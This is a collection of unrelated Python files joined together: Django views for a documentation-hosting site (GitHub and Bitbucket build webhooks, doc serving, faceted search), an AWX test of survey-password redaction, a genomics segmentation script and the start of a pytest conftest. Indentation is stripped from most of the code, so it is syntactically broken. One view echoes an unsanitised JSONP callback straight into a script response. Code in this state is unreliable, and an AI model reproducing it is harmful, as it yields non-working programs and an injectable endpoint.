remove_dir.delay(del_dir)
return render_to_response('wipe_version.html',
{'del_dir': del_dir},
context_instance=RequestContext(request))
def _build_version(project, slug, already_built=()):
default = project.default_branch or (project.vcs_repo().fallback_branch)
if slug == default and slug not in already_built:
# short circuit versions that are default
# these will build at "latest", and thus won't be
# active
version = project.versions.get(slug='latest')
update_docs.delay(pk=project.pk, version_pk=version.pk, force=True)
pc_log.info(("(Version build) Building %s:%s"
% (project.slug, version.slug)))
return "latest"
elif project.versions.exclude(active=True).filter(slug=slug).exists():
pc_log.info(("(Version build) Not Building %s"% slug))
return None
elif slug not in already_built:
version = project.versions.get(slug=slug)
update_docs.delay(pk=project.pk, version_pk=version.pk, force=True)
pc_log.info(("(Version build) Building %s:%s"
% (project.slug, version.slug)))
return slug
else:
pc_log.info(("(Version build) Not Building %s"% slug))
return None
def _build_branches(project, branch_list):
for branch in branch_list:
versions = project.versions_from_branch_name(branch)
to_build = set()
not_building = set()
for version in versions:
pc_log.info(("(Branch Build) Processing %s:%s"
% (project.slug, version.slug)))
ret = _build_version(project, version.slug, already_built=to_build)
if ret:
to_build.add(ret)
else:
not_building.add(version.slug)
return (to_build, not_building)
def _build_url(url, branches):
try:
projects = Project.objects.filter(repo__contains=url)
if not projects.count():
raise NoProjectException()
for project in projects:
(to_build, not_building) = _build_branches(project, branches)
if to_build:
msg = '(URL Build) Build Started: %s [%s]' % (url, ' '.join(to_build))
pc_log.info(msg)
return HttpResponse(msg)
else:
msg = '(URL Build) Not Building: %s [%s]' % (url, ' '.join(not_building))
pc_log.info(msg)
return HttpResponse(msg)
except Exception, e:
if e.__class__ == NoProjectException:
raise
msg = "(URL Build) Failed: %s:%s" % (url, e)
pc_log.error(msg)
return HttpResponse(msg)
@csrf_view_exempt
def github_build(request):
"""
A post-commit hook for github.
"""
if request.method == 'POST':
obj = json.loads(request.POST['payload'])
url = obj['repository']['url']
ghetto_url = url.replace('http://', '').replace('https://', '')
branch = obj['ref'].replace('refs/heads/', '')
pc_log.info("(Incoming Github Build) %s [%s]" % (ghetto_url, branch))
try:
return _build_url(ghetto_url, [branch])
except NoProjectException:
try:
name = obj['repository']['name']
desc = obj['repository']['description']
homepage = obj['repository']['homepage']
repo = obj['repository']['url']
email = obj['repository']['owner']['email']
user = User.objects.get(email=email)
proj = Project.objects.create(
name=name,
description=desc,
project_url=homepage,
repo=repo,
)
proj.users.add(user)
# Version doesn't exist yet, so use classic build method
update_docs.delay(pk=proj.pk)
pc_log.info("Created new project %s" % (proj))
except Exception, e:
pc_log.error("Error creating new project %s: %s" % (name, e))
return HttpResponseNotFound('Repo not found')
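# For reference, the handler above relies on only a few fields of GitHub's
# post-commit payload; a minimal (illustrative, not complete) payload:
# {
#     "ref": "refs/heads/master",
#     "repository": {
#         "url": "https://github.com/owner/repo",
#         "name": "repo",
#         "description": "...",
#         "homepage": "...",
#         "owner": {"email": "owner@example.com"}
#     }
# }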
@csrf_view_exempt
def bitbucket_build(request):
if request.method == 'POST':
payload = request.POST.get('payload')
pc_log.info("(Incoming Bitbucket Build) Raw: %s" % payload)
if not payload:
return HttpResponseNotFound('Invalid Request')
obj = json.loads(payload)
rep = obj['repository']
branches = [rec.get('branch', '') for rec in obj['commits']]
ghetto_url = "%s%s" % ("bitbucket.org", rep['absolute_url'].rstrip('/'))
pc_log.info("(Incoming Bitbucket Build) %s [%s]" % (ghetto_url, ' '.join(branches)))
pc_log.info("(Incoming Bitbucket Build) JSON: \n\n%s\n\n" % obj)
try:
return _build_url(ghetto_url, branches)
except NoProjectException:
pc_log.error("(Incoming Bitbucket Build) Repo not found: %s" % ghetto_url)
return HttpResponseNotFound('Repo not found: %s' % ghetto_url)
@csrf_view_exempt
def generic_build(request, pk=None):
try:
project = Project.objects.get(pk=pk)
# Allow slugs too
except (Project.DoesNotExist, ValueError):
project = Project.objects.get(slug=pk)
if request.method == 'POST':
slug = request.POST.get('version_slug', None)
if slug:
pc_log.info("(Incoming Generic Build) %s [%s]" % (project.slug, slug))
_build_version(project, slug)
else:
pc_log.info("(Incoming Generic Build) %s [%s]" % (project.slug, 'latest'))
update_docs.delay(pk=pk, force=True)
return redirect('builds_project_list', project.slug)
def subproject_list(request):
project_slug = request.slug
proj = get_object_or_404(Project, slug=project_slug)
subprojects = [rel.child for rel in proj.subprojects.all()]
return render_to_response(
'projects/project_list.html',
{'project_list': subprojects},
context_instance=RequestContext(request)
)
def subproject_serve_docs(request, project_slug, lang_slug=None,
version_slug=None, filename=''):
parent_slug = request.slug
proj = get_object_or_404(Project, slug=project_slug)
subproject_qs = ProjectRelationship.objects.filter(
parent__slug=parent_slug, child__slug=project_slug)
if lang_slug is None or version_slug is None:
# Handle /
version_slug = proj.get_default_version()
url = reverse('subproject_docs_detail', kwargs={
'project_slug': project_slug,
'version_slug': version_slug,
'lang_slug': proj.language,
'filename': filename
})
return HttpResponseRedirect(url)
if subproject_qs.exists():
return serve_docs(request, lang_slug, version_slug, filename,
project_slug)
else:
log.info('Subproject lookup failed: %s:%s' % (project_slug,
parent_slug))
raise Http404("Subproject does not exist")
def default_docs_kwargs(request, project_slug=None):
"""
Return kwargs used to reverse lookup a project's default docs URL.
Determining which URL to redirect to is done based on the kwargs
passed to reverse(serve_docs, kwargs). This function populates
kwargs for the default docs for a project, and sets appropriate keys
depending on whether request is for a subdomain URL, or a non-subdomain
URL.
"""
if project_slug:
try:
proj = Project.objects.get(slug=project_slug)
except (Project.DoesNotExist, ValueError):
# Try with underscore, for legacy
try:
proj = Project.objects.get(slug=project_slug.replace('-', '_'))
except (Project.DoesNotExist):
proj = None
else:
# If project_slug isn't in URL pattern, it's set in subdomain
# middleware as request.slug.
try:
proj = Project.objects.get(slug=request.slug)
except (Project.DoesNotExist, ValueError):
# Try with underscore, for legacy
try:
proj = Project.objects.get(slug=request.slug.replace('-', '_'))
except (Project.DoesNotExist):
proj = None
if not proj:
raise Http404("Project slug not found")
version_slug = proj.get_default_version()
kwargs = {
'project_slug': project_slug,
'version_slug': version_slug,
'lang_slug': proj.language,
'filename': ''
}
# Don't include project_slug for subdomains.
# That's how reverse(serve_docs, ...) differentiates subdomain
# views from non-subdomain views.
if project_slug is None:
del kwargs['project_slug']
return kwargs
def redirect_lang_slug(request, lang_slug, project_slug=None):
"""Redirect /en/ to /en/latest/."""
kwargs = default_docs_kwargs(request, project_slug)
kwargs['lang_slug'] = lang_slug
url = reverse(serve_docs, kwargs=kwargs)
return HttpResponseRedirect(url)
def redirect_version_slug(request, version_slug, project_slug=None):
"""Redirect /latest/ to /en/latest/."""
kwargs = default_docs_kwargs(request, project_slug)
kwargs['version_slug'] = version_slug
url = reverse(serve_docs, kwargs=kwargs)
return HttpResponseRedirect(url)
def redirect_project_slug(request, project_slug=None):
"""Redirect / to /en/latest/."""
kwargs = default_docs_kwargs(request, project_slug)
url = reverse(serve_docs, kwargs=kwargs)
return HttpResponseRedirect(url)
def redirect_page_with_filename(request, filename, project_slug=None):
"""Redirect /page/file.html to /en/latest/file.html."""
kwargs = default_docs_kwargs(request, project_slug)
kwargs['filename'] = filename
url = reverse(serve_docs, kwargs=kwargs)
return HttpResponseRedirect(url)
def serve_docs(request, lang_slug, version_slug, filename, project_slug=None):
if not project_slug:
project_slug = request.slug
proj = get_object_or_404(Project, slug=project_slug)
ver = get_object_or_404(Version, project__slug=project_slug,
slug=version_slug)
# Auth checks
if ver not in proj.versions.public(request.user, proj, only_active=False):
res = HttpResponse("You don't have access to this version.")
res.status_code = 401
return res
# Figure out actual file to serve
if not filename:
filename = "index.html"
    # This is required because we're forming the filenames ourselves instead of
    # letting the web server do it.
    elif (proj.documentation_type == 'sphinx_htmldir'
          and "_static" not in filename
          and "_images" not in filename
          and "html" not in filename
          and "inv" not in filename):
filename += "index.html"
else:
filename = filename.rstrip('/')
# Use the old paths if we're on our old location.
# Otherwise use the new language symlinks.
# This can be removed once we have 'en' symlinks for every project.
if lang_slug == proj.language:
basepath = proj.rtd_build_path(version_slug)
else:
basepath = proj.translations_symlink_path(lang_slug)
basepath = os.path.join(basepath, version_slug)
# Serve file
log.info('Serving %s for %s' % (filename, proj))
if not settings.DEBUG:
fullpath = os.path.join(basepath, filename)
mimetype, encoding = mimetypes.guess_type(fullpath)
mimetype = mimetype or 'application/octet-stream'
response = HttpResponse(mimetype=mimetype)
if encoding:
response["Content-Encoding"] = encoding
try:
response['X-Accel-Redirect'] = os.path.join(basepath[len(settings.SITE_ROOT):],
filename)
except UnicodeEncodeError:
raise Http404
return response
else:
return serve(request, filename, basepath)
def serve_single_version_docs(request, filename, project_slug=None):
if not project_slug:
project_slug = request.slug
proj = get_object_or_404(Project, slug=project_slug)
# This function only handles single version projects
if not proj.single_version:
raise Http404
return serve_docs(request, proj.language, proj.default_version,
filename, project_slug)
def server_error(request, template_name='500.html'):
"""
A simple 500 handler so we get media
"""
r = render_to_response(template_name,
context_instance=RequestContext(request))
r.status_code = 500
return r
def server_error_404(request, template_name='404.html'):
"""
    A simple 404 handler so we get media
"""
r = render_to_response(template_name,
context_instance=RequestContext(request))
r.status_code = 404
return r
def divide_by_zero(request):
return 1 / 0
def morelikethis(request, project_slug, filename):
project = get_object_or_404(Project, slug=project_slug)
file = get_object_or_404(ImportedFile, project=project, path=filename)
# sqs = SearchQuerySet().filter(project=project).more_like_this(file)[:5]
sqs = SearchQuerySet().more_like_this(file)[:5]
if len(sqs):
output = [(obj.title, obj.absolute_url) for obj in sqs]
json_response = json.dumps(output)
else:
json_response = {"message": "Not Found"}
jsonp = "%s(%s)" % (request.GET.get('callback'), json_response)
return HttpResponse(jsonp, mimetype='text/javascript')
class SearchView(TemplateView):
template_name = "search/base_facet.html"
results = EmptySearchQuerySet()
form_class = FacetedSearchForm
form = None
query = ''
selected_facets = None
selected_facets_list = None
def get_context_data(self, request, **kwargs):
context = super(SearchView, self).get_context_data(**kwargs)
context['request'] = self.request
# causes solr request #1
context['facets'] = self.results.facet_counts()
context['form'] = self.form
context['query'] = self.query
context['selected_facets'] = ('&'.join(self.selected_facets)
if self.selected_facets else '')
context['selected_facets_list'] = self.selected_facets_list
context['results'] = self.results
context['count'] = len(self.results) # causes solr request #2
return context
def get(self, request, **kwargs):
"""
Performing the search causes three requests to be sent to Solr.
1. For the facets
        2. For the count (unavoidable, as pagination will cause this anyway)
3. For the results
"""
self.request = request
self.form = self.build_form()
self.selected_facets = self.get_selected_facets()
self.selected_facets_list = self.get_selected_facets_list()
self.query = self.get_query()
if self.form.is_valid():
self.results = self.get_results()
context = self.get_context_data(request, **kwargs)
# For returning results partials for javascript
if request.is_ajax() or request.GET.get('ajax'):
self.template_name = 'search/faceted_results.html'
return self.render_to_response(context)
def build_form(self):
"""
Instantiates the form the class should use to process the search query.
"""
data = self.request.GET if len(self.request.GET) else None
return self.form_class(data, facets=('project',))
def get_selected_facets_list(self):
return [tuple(s.split(':')) for s in self.selected_facets if s]
def get_selected_facets(self):
"""
        Returns a list of facetname:value strings,
e.g. [u'project_exact:Read The Docs', u'author_exact:Eric Holscher']
"""
return self.request.GET.getlist('selected_facets')
def get_query(self):
"""
Returns the query provided by the user.
        Returns None if no query was supplied.
"""
return self.request.GET.get('q')
def get_results(self):
"""
Fetches the results via the form.
"""
return self.form.search()
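# A minimal sketch of how SearchView would be exposed in a Django 1.x
# urlconf (assumed for illustration; the project's actual urls.py is not
# shown in this file, and the URL name is hypothetical):
#
#     from django.conf.urls import url
#     from core.views import SearchView
#
#     urlpatterns = [
#         url(r'^search/$', SearchView.as_view(), name='haystack_search'),
#     ]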
| |
# Python
import json
# Django
from django.core.urlresolvers import reverse
# AWX
from awx.main.models import * # noqa
from awx.main.tests.base import BaseTest, QueueStartStopTestMixin
__all__ = ['SurveyPasswordRedactedTest']
PASSWORD="5m/h"
ENCRYPTED_STR='$encrypted$'
TEST_PLAYBOOK = u'''---
- name: test success
hosts: test-group
gather_facts: True
tasks:
- name: should pass
command: echo {{ %s }}
''' % ('spot_speed')
TEST_SIMPLE_SURVEY = '''
{
"name": "Simple",
"description": "Description",
"spec": [
{
"type": "password",
"question_name": "spots speed",
"question_description": "How fast can spot run?",
"variable": "%s",
"choices": "",
"min": "",
"max": "",
"required": false,
"default": "%s"
}
]
}
''' % ('spot_speed', PASSWORD)
TEST_COMPLEX_SURVEY = '''
{
"name": "Simple",
"description": "Description",
"spec": [
{
"type": "password",
"question_name": "spots speed",
"question_description": "How fast can spot run?",
"variable": "spot_speed",
"choices": "",
"min": "",
"max": "",
"required": false,
"default": "0m/h"
},
{
"type": "password",
"question_name": "ssn",
"question_description": "What's your social security number?",
"variable": "ssn",
"choices": "",
"min": "",
"max": "",
"required": false,
"default": "999-99-9999"
},
{
"type": "password",
"question_name": "bday",
"question_description": "What's your birth day?",
"variable": "bday",
"choices": "",
"min": "",
"max": "",
"required": false,
"default": "1/1/1970"
}
]
}
'''
TEST_SINGLE_PASSWORDS = [
{
'description': 'Single instance with a . after',
'text' : 'See spot. See spot run. See spot run %s. That is a fast run.' % PASSWORD,
'passwords': [PASSWORD],
        'occurrences': 1,
},
{
'description': 'Single instance with , after',
'text': 'Spot goes %s, at a fast pace' % PASSWORD,
'passwords': [PASSWORD],
        'occurrences': 1,
},
{
'description': 'Single instance with a space after',
'text': 'Is %s very fast?' % PASSWORD,
'passwords': [PASSWORD],
        'occurrences': 1,
},
{
'description': 'Many instances, also with newline',
'text': 'I think %s is very very fast. If I ran %s for 4 hours how many hours would I run?.\nTrick question. %s for 4 hours would result in running for 4 hours' % (PASSWORD, PASSWORD, PASSWORD),
'passwords': [PASSWORD],
        'occurrences': 3,
},
]
passwd = 'my!@#$%^pass&*()_+'
TEST_SINGLE_PASSWORDS.append({
'description': 'password includes characters not in a-z 0-9 range',
'passwords': [passwd],
'text': 'Text is fun yeah with passwords %s.' % passwd,
    'occurrences': 1
})
# 3 occurrences below because TEST_COMPLEX_SURVEY's spec defines 3 password fields
TEST_MULTIPLE_PASSWORDS = []
passwds = [ '65km/s', '545-83-4534', '7/4/2002']
TEST_MULTIPLE_PASSWORDS.append({
'description': '3 different passwords each used once',
'text': 'Spot runs %s. John has an ss of %s and is born on %s.' % (passwds[0], passwds[1], passwds[2]),
'passwords': passwds,
    'occurrences': 3,
})
TESTS = {
'simple': {
'survey' : json.loads(TEST_SIMPLE_SURVEY),
'tests' : TEST_SINGLE_PASSWORDS,
},
'complex': {
'survey' : json.loads(TEST_COMPLEX_SURVEY),
'tests' : TEST_MULTIPLE_PASSWORDS,
}
}
class SurveyPasswordBaseTest(BaseTest, QueueStartStopTestMixin):
def setUp(self):
super(SurveyPasswordBaseTest, self).setUp()
self.setup_instances()
self.setup_users()
def check_passwords_redacted(self, test, response):
self.assertIsNotNone(response['content'])
for password in test['passwords']:
self.check_not_found(response['content'], password, test['description'], word_boundary=True)
        self.check_found(response['content'], ENCRYPTED_STR, test['occurrences'], test['description'])
# TODO: A more complete test would ensure that the variable value isn't found
def check_extra_vars_redacted(self, test, response):
self.assertIsNotNone(response)
# Ensure that all extra_vars of type password have the value '$encrypted$'
vars = []
for question in test['survey']['spec']:
if question['type'] == 'password':
vars.append(question['variable'])
extra_vars = json.loads(response['extra_vars'])
for var in vars:
self.assertIn(var, extra_vars, 'Variable "%s" should exist in "%s"' % (var, extra_vars))
self.assertEqual(extra_vars[var], ENCRYPTED_STR)
def _get_url_job_stdout(self, job):
url = reverse('api:job_stdout', args=(job.pk,))
return self.get(url, expect=200, auth=self.get_super_credentials(), accept='application/json')
def _get_url_job_details(self, job):
url = reverse('api:job_detail', args=(job.pk,))
return self.get(url, expect=200, auth=self.get_super_credentials(), accept='application/json')
class SurveyPasswordRedactedTest(SurveyPasswordBaseTest):
'''
    Transpose TESTS[<name>]['tests'] into the flatter format below:
[
{
'text': '...',
'description': '...',
...,
'job': '...',
'survey': '...'
},
]
'''
def setup_test(self, test_name):
blueprint = TESTS[test_name]
self.tests[test_name] = []
job_template = self.make_job_template(survey_enabled=True, survey_spec=blueprint['survey'])
for test in blueprint['tests']:
test = dict(test)
extra_vars = {}
# build extra_vars from spec variables and passwords
for x in range(0, len(blueprint['survey']['spec'])):
question = blueprint['survey']['spec'][x]
extra_vars[question['variable']] = test['passwords'][x]
job = self.make_job(job_template=job_template)
job.extra_vars = json.dumps(extra_vars)
job.result_stdout_text = test['text']
job.save()
test['job'] = job
test['survey'] = blueprint['survey']
self.tests[test_name].append(test)
def setUp(self):
super(SurveyPasswordRedactedTest, self).setUp()
self.tests = {}
self.setup_test('simple')
self.setup_test('complex')
# should redact single variable survey
def test_redact_stdout_simple_survey(self):
for test in self.tests['simple']:
response = self._get_url_job_stdout(test['job'])
self.check_passwords_redacted(test, response)
# should redact multiple variables survey
def test_redact_stdout_complex_survey(self):
for test in self.tests['complex']:
response = self._get_url_job_stdout(test['job'])
self.check_passwords_redacted(test, response)
# should redact values in extra_vars
def test_redact_job_extra_vars(self):
for test in self.tests['simple']:
response = self._get_url_job_details(test['job'])
self.check_extra_vars_redacted(test, response)
| |
#!/usr/bin/python
import sys, getopt
from random import random
verbose = False
output = sys.stdout
from encode import *
def generateSequences(number=1, means = [0.1, 0.3, 0.5, 0.7, 0.9], meanBlockLength=1000, sdBlockLength=200, regLength=100000):
from random import gauss as normal
for i in xrange(1,number+1):
        totalLength = 0
sequences = []
for mean in means:
            loop = 0
while loop < regLength:
length = max(0, int(normal( meanBlockLength, sdBlockLength )))
if random() <= mean:
sequences.append([totalLength+loop, totalLength+loop+length])
loop += ( length + 2 )
sequences[-1][-1] = min(sequences[-1][-1], totalLength+regLength-1)
totalLength += regLength
of = open('sim_output_%i.bed' % i, 'w')
for entry in sequences:
of.write( "name\t%i\t%i\n" % tuple(entry) )
of.close()
of = open('sim_lengths.txt', 'w')
of.write("name\t0\t%i" % totalLength )
of.close()
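# A typical direct call, as suggested in usage() below; the parameter values
# here are illustrative. This writes sim_output_1.bed .. sim_output_3.bed
# plus sim_lengths.txt into the working directory:
#     generateSequences(number=3, means=[0.2, 0.8], regLength=50000)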
def segment(data, minLength, b=0, maxIterations=100, M_TOL = 0):
"""A method to segment an annotation track.
"""
# an object to keep track of the scores we've already calculated
cached_scores = {}
def change_point_mle(data, lb, ub, si, bl):
"""Process 4.7 from the paper.
        Data should be a cumulative-sum object.
"""
# if the interval isn't long enough, return 0
if ( ub - lb ) <= 2*bl: return 0
# n is the total considered interval length
# we add 1 because the interval is inclusive
n = float(ub - lb + 1)
# we add 1 to j because the interval includes data[si]
j = float(si - lb + 1)
s1_mean = float(data[si] - data[lb])/j
s2_mean = float(data[ub] - data[si+1])/(ub-si)
tot_mean = float(data[ub] - data[lb])/n
p1 = (j/n)*(s1_mean - tot_mean)**2
p2 = ((n-j)/n)*(s2_mean - tot_mean)**2
return p1+p2
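    # In symbols (reconstructed from the code above, not quoted from the
    # paper): with n = ub-lb+1, j = si-lb+1, segment means m1 and m2 on
    # either side of si, and overall mean m, change_point_mle returns
    #     (j/n)*(m1 - m)**2 + ((n-j)/n)*(m2 - m)**2
    # i.e. the between-segment variance induced by splitting at si.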
def bbs_var_estimate( data, lb, ub, si, bl ):
"""Process 4.8 from the paper.
        Data should be a cumulative-sum object.
"""
# n is the total considered interval length
# we add 1 because the interval is inclusive
n = float(ub - lb + 1)
# we add 1 to t because the interval includes data[si]
t = float(si - lb + 1)
s1_mean = float(data[si] - data[lb])/t
s2_mean = float(data[ub] - data[si+1])/(ub-si)
tot_mean = float(data[ub] - data[lb])/n
def wmn(i, offset):
return float(data[lb+i+offset] - data[lb+i])/offset
# part 1 of equation 4.8
offset = int(t*bl/n)
sti, ei = ( 0, int(t-t*bl/n) )
p1 = (t/n**2)*sum( [(wmn(i, offset) - s1_mean)**2 for i in xrange(sti, ei)] )
# part 2 of equation 4.8
sti, ei = ( int(t+1), int(n-(n-t)*bl/n) )
offset = int((n-t)*bl/n)
p2 = ((n-t)/n**2)*sum( [(wmn(i, offset) - s2_mean)**2 for i in xrange(sti, ei)] )
return p1+p2
def find_best_window_score(data, lb, ub):
        if (lb, ub) in cached_scores:
return cached_scores[(lb, ub)]
else:
# the best MLE score ( in splitWindow )
currBestScore = 0
# the best split index ( in splitWindow )
currBestIndex = None
# loop through each possible index and calculate the scores
# note that we're calling the iter_split_points method:
# this is an optimization for binary features - it only looks
# at the potential split points
for index in data.iter_split_points(lb+minLength, ub-minLength):
# calculate the score of using this change point
score = change_point_mle(data, lb, ub, index, minLength)
# eliminate the occasional rounding error
if score < M_TOL: score = 0
# if this is the current best score, store a record of it
if score > currBestScore:
currBestScore = score
currBestIndex = index
cached_scores[(lb, ub)] = ( currBestScore, currBestIndex )
return ( currBestScore, currBestIndex )
def find_split(data, splitIndexes):
bestWindow = None
bestIndex = None
bestScore = 0
for splitWindowIndex in xrange(len(splitIndexes) - 1):
# define the window that we will be looking for a split in
splitWindow = (splitIndexes[splitWindowIndex], splitIndexes[splitWindowIndex+1])
            # if the window isn't at least 2L, it will be impossible to find a split of length L
            if ( splitWindow[1] - splitWindow[0] ) < 2*minLength: continue
            # find the best score and its index
score, index = find_best_window_score(data, splitWindow[0], splitWindow[1])
# if there is no possible split, continue
            if index is None:
continue
if b > 0:
# calculate J
V = bbs_var_estimate(data, splitWindow[0], splitWindow[1], index, minLength)
B = score
reg_len = float(splitWindow[1] - splitWindow[0])
lam = minLength*reg_len/( splitIndexes[-1] - splitIndexes[0] )
J = int( (reg_len*B)/(V*lam) > b )
if verbose:
print >> output, "b: ", (reg_len*B)/(V*lam), " > ", b, "\tM: ", score, "\tBest Index: ", index
# if the best score for this window is the best so far for all the windows
# then make a record of that
if score > bestScore and ( b == 0 or J > 0 ) :
bestIndex = index
bestScore = score
bestWindow = splitWindowIndex
        if bestIndex is not None:
# XXX THE VARIANCE CODE IS BROKEN!!!
#best_V_score = bbs_var_estimate(data, splitIndexes[bestWindow], splitIndexes[bestWindow+1], bestIndex, minLength)
best_V_score = 0
return {'Best Window': bestWindow, 'Best Index': bestIndex, 'M': bestScore, 'V': best_V_score}
# otherwise, return None
else:
return None
### Actually do stuff ##############################################################################################
splitIndexes = [0,len(data)-1]
if maxIterations == None:
maxIterations = int( ( 2.0*len(data) )/minLength )
for loop in xrange(maxIterations):
split_data = find_split( data, splitIndexes )
if verbose: print >> output, loop, splitIndexes, "\n", split_data
if split_data == None: break
splitIndexes.insert(split_data['Best Window']+1, split_data['Best Index'])
return splitIndexes
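# Sketch of how segment() is driven in main() below: given a cumulative_data
# object built from a parsed region,
#     splits = segment(cd, min_length, b=0, maxIterations=max_splits)
#     pieces = data.split(splits[1:-1])  # the two endpoints are not passed on
# the returned list always brackets the region with 0 and len(data)-1 and
# inserts every accepted change point in between.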
def merge_boundaries(boundaries, regions_list, min_boundary_len):
"""This merges boundaries.
"""
base_region = regions_list[0]
# a method to flatten the boundaries list
def flatten(lst):
for elem in lst:
if type(elem) in (tuple, list):
for i in flatten(elem):
yield i
else:
yield elem
# make the boundaries list unique
boundaries = list(set(flatten(boundaries)))
# sort the boundaries list
boundaries.sort()
# test for regions that are too small
loop = 0
while loop < len(boundaries)-1:
if verbose:
print "Curr Boundaries: ", boundaries
rs = boundaries[loop]
re = boundaries[loop+1]
if re - rs + 1 < min_boundary_len:
# if rs == 0, then we MUST put this in with the next bucket
if rs == 0:
boundaries.remove(re)
            # if re == the last boundary, then we MUST put this in with the previous bucket
elif re == boundaries[-1]:
boundaries.remove(rs)
else:
                # try to merge this bucket with the neighbouring bucket whose mean is closest
# with respect to base_region
prev_reg = base_region[boundaries[loop-1]:boundaries[loop]]
mean1 = prev_reg.featuresLength()/float( boundaries[loop] - boundaries[loop-1] + 1 )
next_reg = base_region[boundaries[loop]:boundaries[loop+1]]
mean2 = next_reg.featuresLength()/float( boundaries[loop+1] - boundaries[loop] + 1 )
current_mean = base_region[rs:re].featuresLength()/float( re - rs + 1 )
if verbose:
print "Lower Mean: %.5f Current Mean: %.5f Upper Mean: %.5f" % (mean1, current_mean, mean2)
if abs(current_mean - mean1) < abs(current_mean - mean2):
boundaries.remove(rs)
else:
boundaries.remove(re)
            # restart the loop
loop = 0
else:
#increment the loop
loop += 1
return boundaries
def usage():
print >> output, """
Split a bed file into more regions and writes the result into a new bed file.
INPUTS:
-i --input: The regions to split, in a .bed file.
alternatively, to split two bed files by their combined split points
-1 --input1: region1 to split, in a .bed file.
-2 --input2: region2 to split, in a .bed file.
-d --domain : the domain of the data files, the portion of the genome over
which these features (-1 and -2) are defined. The support of the
statistics. Usually determined by array coverage or "alignability". If the
features are defined everywhere (e.g. such as may be the case in C. elegans
data), then this file contains one line for each chromosome, with:
"chr_name 0 chr_length" on each line.
-m --min_length: For the "double bootstrap" in any organism this should be at
least 5,000,000. For human or mouse, it should be at least 1,000,000 in
general, for Drosophila at least 500,000, and for C. elegans, at least
250,000. Larger values will cause down stream analysis to be more
conservative, so initial runs should use quite large values. If
significance is obtained with larger values, it will certainly hold for
smaller ones.
-s --max_splits: The maximum number of times to split a region. Defaults to
no maximum. Recommended: no maximum.
-p --plot: Plot the CDF of the region data and overlay the calculated split
points. This option requires that the pylab module is part of your python
distribution ( usually part of matplotlib ) and that you are running this
locally.
-g --generate_test_data: Generates a region of test data and writes it to
sim_output.bed and sim_lengths.txt. The region will be approximately 500k
BP's long and consist of intervals with normally distributed lengths of
mean 1k BP's and SD's of 200 BP's. The region will consist of 5 ( unnamed )
subregions of length 100k and with means (0.1, 0.3, 0.5, 0.7, 0.9). For
finer control over the generation procedure, load this as a module and
call the function generateSequences directly.
-o --output_file_prefix: A file prefix to name the output files. For instance,
if the input file names are test.bed and test.txt, and the prefix is split_,
the files will be written to split_test.bed and split_test.txt. The
prefix defaults to split_. THIS WILL SILENTLY OVERWRITE ANY EXISTING FILES
OF THE SAME NAME !
"""
def main():
try:
long_args = ["input=", "input1=", "input2=", "domain=", "min_length=", "max_splits=", "output_file_prefix=", "verbose", "plot", "generate_test_data", "help"]
opts, args = getopt.getopt(sys.argv[1:], "i:1:2:d:m:s:o:vpgh", long_args)
except getopt.GetoptError, err:
print str(err)
usage()
sys.exit(2)
# set the default options
max_splits = None
output_fname_prefix = "split_"
do_plot = False
for o, a in opts:
if o in ("-v", "--verbose"):
global verbose
verbose = True
elif o in ("-h", "--help"):
usage()
sys.exit()
elif o in ("-i", "--input"):
split_file = open(a)
elif o in ("-1", "--input1"):
split_file1 = open(a)
elif o in ("-2", "--input2"):
split_file2 = open(a)
elif o in ("-d", "--domain"):
lengths_file = open(a)
elif o in ("-m", "--min_length"):
min_length = int(a)
elif o in ("-s", "--max_splits"):
max_splits = int(a)
elif o in ("-p", "--plot"):
try:
global pylab
import pylab
except ImportError:
raise ImportError, "Must have pylab installed to use plot option."
else:
do_plot = True
elif o in ("-g", "--generate_test_data"):
print "Saving the simulated region as 'sim_output.bed' and 'sim_lengths.txt'..."
generateSequences(number=2)
print"\nfinished.\n"
sys.exit()
elif o in ("-o", "--output_file_prefix"):
output_fname_prefix = a
else:
assert False, "unhandled option %s" % o
try:
        assert 'split_file' in vars() or ('split_file1' in vars() and 'split_file2' in vars())
        assert 'lengths_file' in vars()
        assert 'min_length' in vars()
except Exception, inst:
print inst
usage()
sys.exit()
    if 'split_file' in vars():
split_files = ( split_file, )
else:
split_files = (split_file1, split_file2)
# build the regions list
regions_s_to_split = [parse_bed_file(fp, lengths_file) for fp in split_files ]
if verbose:
print >> output, "Region files parsed."
# close all of the open files
for fp in split_files:
fp.close()
lengths_file.close()
if verbose:
import time
startTime = time.time()
import encode
baseRegions = []
for i in xrange(len(regions_s_to_split)):
test = encode.regions()
baseRegions.append(test)
# for each named region in
for key in regions_s_to_split[0].keys():
# store the region boundaries for each area
region_boundaries = []
# a list of region's for this key
region_list = [ regions[key] for regions in regions_s_to_split ]
# make sure all of the lengths are the same
assert len(set( region.length for region in region_list )) == 1
# for each regions in the regions
# note that we require the regions 'line up'
# the named regions should have identical names and lengths
for data in region_list:
cd = cumulative_data( data )
if verbose:
print >> output, "Cumulative Data object built for %s" % key
region_boundaries.append( segment( cd, min_length, b=0, maxIterations=max_splits) )
if verbose:
print >> output, "\n", region_boundaries
if do_plot:
cumulative_data( data ).plot( region_boundaries[-1] )
print "Press enter to continue..."
raw_input()
# merge the region boundaries
if len(region_list) == 1:
boundaries = region_boundaries[0]
else:
boundaries = merge_boundaries( region_boundaries, region_list, min_length )
if do_plot and len(split_files) > 1:
for data in region_list:
cumulative_data( data ).plot( boundaries )
print "Press enter to continue..."
raw_input()
if verbose:
print boundaries
for data, baseRegion in zip(region_list, baseRegions):
        # note that we don't put the beginning and end into the split argument
split_data = data.split(boundaries[1:-1])
baseRegion.extend(split_data)
for fp in split_files:
        ### FIX ME - I shouldn't be writing and overwriting the lengths file
# write the output to a bed file
of = open(output_fname_prefix + fp.name, 'w')
olf = open(output_fname_prefix + lengths_file.name, 'w')
baseRegion.writeBedFile(of, olf)
of.close()
olf.close()
if verbose: print >> output, "Execution Time: ", time.time()-startTime
if __name__ == "__main__":
main()
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import pytest
import hypothesis as h
try:
import pathlib
except ImportError:
import pathlib2 as pathlib # py2 compat
# setup hypothesis profiles
h.settings.register_profile('ci', max_examples=1000)
h.settings.register_profile('dev', max_examples=10)
